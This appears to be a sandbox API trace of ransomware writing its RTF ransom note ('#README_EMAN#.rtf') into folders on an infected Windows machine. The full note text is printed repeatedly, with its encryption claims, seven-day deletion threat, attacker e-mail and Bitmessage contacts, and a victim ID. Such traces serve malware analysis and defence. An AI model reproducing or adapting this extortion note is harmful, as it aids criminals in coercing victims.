\r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.229] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nwØ\x18Æ;Q¢\x9fzP±\x15þ\x02¾oÈ\x1aÁ;\x9dÍ\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0285.229] WriteFile (in: hFile=0x294, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.230] CloseHandle (hObject=0x294) returned 1 [0285.231] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\#readme_eman#.rtf")) returned 0xffffffff [0285.231] GetLastError () returned 0x2 [0285.231] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.245] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES 